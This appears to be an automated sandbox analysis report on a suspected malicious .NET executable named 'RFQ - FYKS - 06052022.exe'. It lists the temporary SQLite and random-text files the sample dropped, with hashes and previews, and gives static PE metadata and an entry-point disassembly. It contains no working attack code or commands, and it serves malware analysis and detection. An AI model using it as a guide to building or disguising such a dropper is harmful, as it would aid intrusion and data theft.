                                                                                      Preview:PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

                                                                                      C:\Users\user\AppData\Local\Temp\tmp6BF5.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.6970840431455908
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                      MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                      SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                      SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                      SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp772C.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp858C.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.792852251086831
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp8CE9.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmp8D6D.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6969712158039245
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:zDLHcjI8IQ6sNUYzo1jfRRMF6zzC3ZzNTWx7M00:zDL4ImUYzebRR66C3Z0JMR
                                                                                      MD5:31CD00400A977C512B9F1AF51F2A5F90
                                                                                      SHA1:3A6B9ED88BD73091D5685A51CB4C8870315C4A81
                                                                                      SHA-256:E01ADE9C56AF2361A5ADC05ADE2F5727DF1B80311A0FDC6F15B2E0FFFACC9067
                                                                                      SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
                                                                                      Malicious:false
                                                                                      Preview:PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE

                                                                                      C:\Users\user\AppData\Local\Temp\tmp91E8.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpA7DC.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.792852251086831
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpA920.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.792852251086831
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpCB8A.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.69422273140364
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                      MD5:A686C2E2230002C3810CB3638589BF01
                                                                                      SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                      SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                      SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                      Malicious:false
                                                                                      Preview:SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

                                                                                      C:\Users\user\AppData\Local\Temp\tmpCD52.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701704028955216
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:t3GWl91lGAalI86LPpWzUkxooDp2Eb6PEA7lhhzhahpmvYMp+wq2MseSnIrzv:t2Wl91lGAad/xoo12e6MyF4/jMp+t2Mh
                                                                                      MD5:5F97B24D9F05FA0379F5E540DA8A05B0
                                                                                      SHA1:D4E1A893EFD370529484B46EE2F40595842C849E
                                                                                      SHA-256:58C103C227966EC93D19AB5D797E1F16E33DCF2DE83FA9E63E930C399E2AD396
                                                                                      SHA-512:A175FDFC82D79343CD764C69CD6BA6B2305424223768EAB081AD7741AA177D44A4E6927190AD156D5641AAE143D755164B07CB0BBC9AA856C4772376112B4B24
                                                                                      Malicious:false
                                                                                      Preview:BNAGMGSPLOQNKLVQWYYWYGDTNIHHPSGKYBNBNGFSZGYYFUVNSOYTAMZPOIOKMFFWDJIYCJGTWZSMXADBSJDEKDTPXDVYBIZFLSTFISYXAKAYQWPLDFAWXXNTSVHRLCINNTRJHMBFQAQBHFRSHDDRJZGIFSOFSRODXCWFIUZRXRQSOCPSXKXNEHLQYKIBJRTMMHJOIZSWESTHTXPULAPGLZHBOLMPQWYSWWOGRJQGYWDWWZMHZMTDMRWBSPIXHCFFOHTJSOAULKIFZVXPTYEBTBEXGQNBQAECQOJGHTKIAXUJLSLPBKTTRORROLNTKPDPOMSZBBLUYFRZXYZSVBGBEMGTACDCBJNXKAMZMCYEWGKSUENLKBJSZIPKQGYXMJTJXBELNVMAZHRUESZSTWROIUXLLMQPYLVQYLCOMOCGPSMJQGILSDDRUUXDRUCCVECNPLWHJLTHCPBZIKDUNRJMJIOQOCHVVNIQFFXFKFHTCVEEAXHTLJMWIUAWAMHGIGQCQJZGXBEDCRRZCNVYKCPWVJCRXIGXZYJENNARSZZREAOODIGZVBXFPAHTZNKNQHLNNETJICOVQGFLQSGSLCOYMPYDSGOPNUXAMCIJBJPJBAABYHKBKWCUAXUHNOCSSTHZYJXPLMFVJQAJDDSNEVXLRUYEQEKUKUIAOQAQJMNLHOUFLFUDMCWRNYNNLOACVSDXDNNBOGQOYGOZTWUOFZYLZQXJEGPQNQFLLILMQUJLCLUOOAOAQRCWMGKHGFJRPSFVQPCSCUDFVYSGDQIHJWSUDEAMVIANGMMFSJJTPNRYYSJYDFLUXJZGSYAAUHOEPMQIZZRSZDCXHRCIPUERSVKWEBDJCXEWWKPAHBVZESVEWPJTYRBKLHQRRPGDGQPGTNNFRMWNTGWIZDBPSGFQDFZWTVLRAOKRBHWFHBPZUBSCFBAMHEWXUIUXMKHPOCNYWNKSRYBQKSUWJLJRNBFNMTDBSZDXVFSLPDQEDCNYELVD

                                                                                      C:\Users\user\AppData\Local\Temp\tmpCE18.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpD0C9.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpDB3F.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.792852251086831
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpDB5A.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpF824.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):73728
                                                                                      Entropy (8bit):1.1874185457069584
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                      MD5:72A43D390E478BA9664F03951692D109
                                                                                      SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                      SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                      SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\tmpF84B.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.6970840431455908
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                      MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                      SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                      SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                      SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.747665185570033
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:RFQ - FYKS - 06052022.exe
                                                                                      File size:632320
                                                                                      MD5:2a348d2b6798a26f0fb552108cb870fb
                                                                                      SHA1:f0500df6591299b7290a24234fce9d5ed843b553
                                                                                      SHA256:fd4c999083d99e6c8898be8cd29d281922d49754a1c7adb1b4d8bb0e7f69bb19
                                                                                      SHA512:a386aaefd07de33a5300bc5e8b14dee5de5894c79f80816f1f0441a42075007e8ffbf60bae616c6cda3d7a546f9b0e799157e6671ba9dd24e0c4982859f7f05d
                                                                                      SSDEEP:12288:xP7PZwKxupoy6A3hSXTf+ujd+uXCvS45jg7zAaXg9n:xjWJayt0XTGux+HvJ50HVk
                                                                                      TLSH:11D4EF1073E82AAEE17FAB35D4764450C772BF07E9AEEB0D4E44B2D914F27A08911763
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.._...D......y.... ........@.. ....................................`................................

                                                                                      File Icon

                                                                                      Icon Hash:c49a0894909c6494

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x497f79
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                      Time Stamp:0x83941809 [Thu Dec 15 00:12:57 2039 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:v4.0.30319
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
